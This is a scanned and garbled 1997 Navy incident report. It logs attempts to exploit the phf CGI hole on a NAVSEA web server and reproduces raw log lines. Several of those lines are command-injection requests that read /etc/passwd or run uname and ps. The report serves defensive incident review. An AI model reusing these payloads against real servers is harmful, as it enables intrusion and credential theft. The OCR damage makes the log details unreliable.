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Report Date: 30 Apr il 1997 • ' * 

Name: B 

Commaxia: Indian Head MD ^ » 

Phone (COMM): 301-743-6474 V 

E-Mail: navsea.navy.mil/ webmaster@www.navsea.navy.mil 

Type: Intrusion Attempts 

Victim IP: www.navsea.navy.mil (akanavsea.navy.mil) 144.11.10. 
110 

Port/Servicei phf 

Incident Date: 3 Dec 97 to 30 Apr 97 
NCIS Case #: 

Case Status: 

Notes: After receiving a NAVCIRT Advisory on cgi-bin vulnerabilities, 

command checked their audit logs for traces of attempts to exploit the 

vulnerabilities identified. The command found 24 attempts to get thei 

password file from 18 separate IP addresses dating between 3 December 
through - ~ 

30 April 1997. I 


Logs follow: 


404 0 

23/12/1 HTTP/1.0 
404 166 


a HTTP/1. 


404 145 


[03/Dec/1996:17:56:HEAD /cgi-bin/WebQuery HTTP 
(18/Dec/1996:08:02:GET /cgi-bin/net.Thread.pi/ 

i 

[24/Dec/1996:08:40:GET /cgi-bin/sites.pl?-alph 
[24/Dec/1996:08:40:GET /cgi-bin/rsitea.pl?-alp 


404 146 

md59-099.compueerve.com [25/Dec/1996:05:23:GET /cgi-bin/wais-text-mult 
i? HTTP/1.0 

ppp85 .tsl.enterprise. ca t06/ Jan/1997: 21 ; 56 ;GET /cgi-bin/phf?Qalias*X%0 
Acat%20/etc/passwdcgi-bin/phf? HTTP/ 1.0 

ppp85.tsl.enterprise^ea [06/Jan/1997 S 21t56:GET /cgi-bin/phf?Qalias=X%0 
Acat%20/etc/passwd HTTP/1.0 
200 88 

head682.dt.navy.mil [09/Jan/1997:16:21:GET /cgi-bin/rphone.pl HTTP 

/ 1.0 

404 146 

head682.dt.navy.mil (09/Jan/1997:16:42:GET /cgi-bin/rphone.pl HTTP 
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/ 1.0 

404 146 

head682.dt.navy.mil [09/Jan/1997:16:49:GET /cgi-bin/rphone.pi HTTP 

/ 1.0 

404 146 

[13/Jan/1997:15 : 40:GET /cgi-bin/ilpcnew.sh?fir 

St = HTTP/i.o 

404 147 

atrocious .dialin.utoront [19/Jan/1997:08:09:GET /cgi-bin/wais-text-mult 
i? HTTP/1.0 

404 -4 

mcipmcfw.pmc.lirtB^^ com[23/Jan/1997:14:35 :GET /cgi-bin/pursuit?query= 
at lant i c+sys tenu3+group+turns tyle&matchmode= 

or&minscore=.l&maxhits= 

40&terse=terse 

404 -4 

www4.worldtel.net [26/Jan/1997:15:30:GET /cgi-bin/phf/?Qalias=x% 

ff/bin/cat%20/etc/passwd 
200 92 

4HH|p.vianet.net.au [28/Jan/1997:09:29:GET /cgi-bin/«hf/?Qalias*x% 

.a/bin/cat%20/etc/passwd 
_200 93 

HHHBV [21/Feb/1997:13 :15 :GET /cgi-bin/phf ?Q=x%0aunam 

e+-a 

200 76 

[11/Mar/1997:21:10:GET /cgi HTTP/1.0 

404 132 

nnsdc-bh.cc.nns.com [01/Apr/1997:10:53:GET /cgi-bin/pursuit7query= 
NORFOLK%2 0NAVAL%2 OYARDHTTP/1.0 
404 144 

[ 10/Apr/1997:14:06;GET /cgi-bin/ilpcnew.sh?fir 




404 147 

.CompuServe. [12/Apr/1997:21;37:GET /cgi-bin/phf?Qalias=x%0 
n/cat*2U/etc/passwd HTTP/1.0 
200 93 

pppl.eagle.ovik.se [15/Apr/1997:08:11:GET /cgi-bin/phf?Qalias=x%0 

a/bin/cat%20/etc/passwd HTTP/1.0 
200 93 

ppp63.cityline.ru [30/Apr/1997:10:58:GET /cgi-bin/phf?Q=x%0aunam 

e%20-a 

404 139 

ppp63.cityline.ru [30/Apr/1997:10:58:GET /cgi-bin/phf?Q=x%0aps%2 

0-eaf 

404 139 

ppp63.cityline.ru [30/Apr/1997;10:58:GET /cgi-bin/phf ?Q*x%0acat% 

20/etc/passwd . £ 

404 139 Wf 
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